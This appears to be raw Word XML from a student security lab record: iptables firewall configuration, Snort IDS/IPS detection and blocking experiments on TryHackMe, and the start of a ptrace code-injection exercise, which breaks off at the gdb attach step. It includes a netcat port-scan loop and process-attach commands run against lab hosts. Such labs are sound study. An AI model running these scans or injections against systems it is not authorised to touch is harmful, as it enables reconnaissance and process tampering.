    <w:p w14:paraId="12119CF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-F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BFBF8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F231A98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Verifying rules after flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C02BC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675C8D8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4ADF67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**Chain INPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D42B2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6688A32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2E6FDA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Chain FORWARD (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E051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53358B1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825950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OUTPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2CC5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destination**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5F23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758C0F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Setting default policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F010B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-P INPUT DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBED4F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-P FORWARD DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBD07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-P OUTPUT ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78E71B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546BF0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Allowing loopback traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BC05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lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFB8E8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D555F3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Allowing established connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31BC8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-m state --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>state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ESTABLISHED,RELATED</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219B2A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EE85C7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Allowing SSH service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FC48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22 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93489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F54584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Allowing HTTP service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CBF8C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80 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912F73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7A25FB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Checking IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F5AA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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2886A59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1FB6C07F" w14:textId="49986B15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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.0.1/8 scope host lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103947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10. Allowing HTTPS service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41645CC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443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4247D7D8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93050F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Blocking ICMP (ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FB36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icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1764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D13DDD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12. Saving firewall rules (correct method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3306C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iptables-save |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tee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/iptables/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>rules.v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696FF0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9C3162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***filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36734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:INPUT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> DROP [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF0FD7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:FORWARD DROP [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38076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:OUTPUT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACCEPT [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8015F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-A INPUT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lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD6822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-A INPUT -m state --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>state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RELATED,ESTABLISHED</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B4C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22 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4ED9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80 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC1D1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443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A55CF2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icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9017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COMMIT**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA9E42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956040C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3E6116E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C37975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BB560B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53FA115" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F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084BEEE0" w14:textId="7750E3CA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13. Verifying final firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417C92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7F8D162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298352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**Chain INPUT (policy DROP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043C089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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>all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</w:p>
    <w:p w14:paraId="0E22402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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>all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state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RELATED,ESTABLISHED</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5303F3F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dpt:ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59B2C50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dpt:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A3DCB9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dpt:https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FB8AAE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DROP       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>icmp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--  anywhere</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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</w:p>
    <w:p w14:paraId="1A818FE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77B447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FORWARD (policy DROP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFAE5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CF9F7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Chain OUTPUT (policy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ACCEPT)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55254EA1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3464B6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AC6C0B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5DC560C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0DDBFDB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61628E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1B2CC306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1F427621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53BA854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35973AC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5B78DB0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DC349C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the firewall was successfully configured using iptables by setting default policies, allowing required services, blocking ICMP traffic, and saving the rules. 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4F6D430" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="23C925F2" w14:textId="1BF82F4D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6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="76C16970" w14:textId="2CDFBD26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SNORT IDS/IPS TO DETECT AND PREVENT REAL TIME THREATS IN TRYHACKME PLATFORM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="12E91C2B" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C3721DC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A1AC878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0896B60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D01ECBE" w14:textId="13EA4C61" w:rsidR="00F44251" w:rsidRDefault="00835F24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 xml:space="preserve">To detect and prevent real-time network attacks using Snort IDS/IPS using the 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 xml:space="preserve"> Snort room.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE411B5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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_4upmf4zbwrq6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1188410C" w14:textId="77777777" w:rsidR="00F44251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vydzba94fx2u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6.1 – ICMP Detection (IDS Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334193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Running Snort in IDS mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B9159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snort -A console -c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/snort/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>snort.conf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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077F542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ACBF21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**Commencing packet processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14719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[**] ICMP Ping Detected [**]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455AD8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{ICMP} 10.49.146.164 -&gt; 8.8.8.8**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE01E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6CD000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Generating ICMP traffic (Ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186A3B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ping -c 4 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542C25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D27A72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**4 packets transmitted, 0 received, 100% packet loss**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543770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83B144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Observation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Snort successfully detected ICMP ping packets and generated alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D869AFF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pumi5r8egfp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0FF51E5A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nl5i8kuowtxr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="499A23E2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2sa0edcrxyac" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="395F6FFE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4vsrhy8rxcs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1D58236A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no3qsju1dl01" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="59535F9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3" w:name="_k6ks4f8tuc4b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6E861125" w14:textId="77777777" w:rsidR="00F44251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4" w:name="_ghj0wdo6guyd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Experiment 6.2 – TCP Port Scan Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C9F9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Running Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E944EE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snort -A console -c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/snort/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>snort.conf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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA30FD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CA284F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**[**] TCP Scan Activity Detected [**]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4C35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{TCP} 10.49.89.5 -&gt; 10.49.146.164:80**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A579E6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E63AFA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Performing Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215761C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p in {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">100}; do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nc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zv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.49.146.164 $p; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EF8A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0A5944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**Connection refused (for most ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3551F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Connection to port 22 succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795333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Connection to port 80 succeeded**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB76D7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B6ADB1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Observation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Snort successfully detected TCP port scan activity and generated alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64CC8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F079E47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5" w:name="_3oms39jrpsrc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="424FE2F5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6" w:name="_jrums74njcxt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0DC2B0B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7" w:name="_i5wvgf91sl8x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0101280F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8" w:name="_hznkgajpdd38" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="246A6BF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9" w:name="_pab9zcrjlrfx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="21BBC1A3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0" w:name="_pb7g3g1bdtkh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3B005B53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1" w:name="_99asjjie8mpb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="17BC5DD4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2" w:name="_fu8e59klx59x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3068419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3" w:name="_za2vi2831vab" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2AA83051" w14:textId="77777777" w:rsidR="00F44251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4" w:name="_h76ppnusota8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Experiment 6.3 – IPS Blocking (Inline Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115268B3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Running Snort in Inline Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187434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snort -Q --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>daq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afpacket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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0:eth</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0 -c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/snort/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>snort.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D2C4FE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80361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**Commencing packet processing in inline mode**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C28DB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6C31BA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Generating ICMP traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76092A7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ping 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AEEBA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9941A9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**Request timeout / No reply**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD35C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893DC3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Observation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ICMP packets were blocked successfully, showing IPS functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B751A07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67460C7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5" w:name="_psf4mbxorxy0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="39B16ADD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6" w:name="_5tg74v3afw9f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="665D7F71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7" w:name="_mdxb6zflama2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="2BEF061E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8" w:name="_wye5113g31w2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0BCA6E3D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9" w:name="_osuol9e8a3pj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="6FF3DC9E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0" w:name="_38pngtl7ilis" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="79639E05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1" w:name="_4djl5appu40w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="7DB21322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2" w:name="_ebw9xcs9pk1a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4F4D6925" w14:textId="77777777" w:rsidR="00835F24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33" w:name="_sumdr324k57t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/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RESULT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:Thus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 Snort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IDS/IPS was successfully used to detect ICMP and TCP scan attacks and prevent them using inline mode on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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33950028" w14:textId="59A35684" w:rsidR="00F44251" w:rsidRPr="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F2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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                          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022A5D35" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="49C0C3B0" w14:textId="7BCB389C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4" w:name="_gqj4lzjvo7nm" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="34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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="03201DF8" w14:textId="63B1AA52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CODE INJECTION ON APPLICATION PROCESS USING PTRACE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="3A79AC9C" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4670E1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F65422C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4AA86D66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82CF104" w14:textId="7367B9B5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demonstrate code injection on a running Linux application process using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ptrace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concepts in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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F26FC06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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_geptrr4cmt7v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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059F364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Listing running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F292F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aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFDF98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D59C4E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**root       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1023  0.0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0.1  18500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3200 ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        Ss   10:20   0:00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sbin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sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47E368C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ubuntu     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1456  0.0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0.2  23456</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  4500 pts/0    S+   10:25   0:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>00 .</w:t>
      </w:r>
      <w:proofErr w:type="gram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target_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A3736C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ubuntu     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1500  0.0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0.1  12000</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  2100 pts/1    R+   10:26   0:00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aux**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CD7F1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035113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Tracing the process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strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EE15A1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strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 1456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649332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13BB44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**attach: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ptrace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PTRACE_ATTACH, 1456, NULL, NULL) = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81186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read(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0, "", 1024)                     = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25933D1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write(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1, "Running...\n", 11)          = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B118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nanosleep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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tv_sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">=1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tv_nsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>=0}, NULL) = 0**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCBCD8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1E5588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3. Attaching debugger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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2682E7E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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
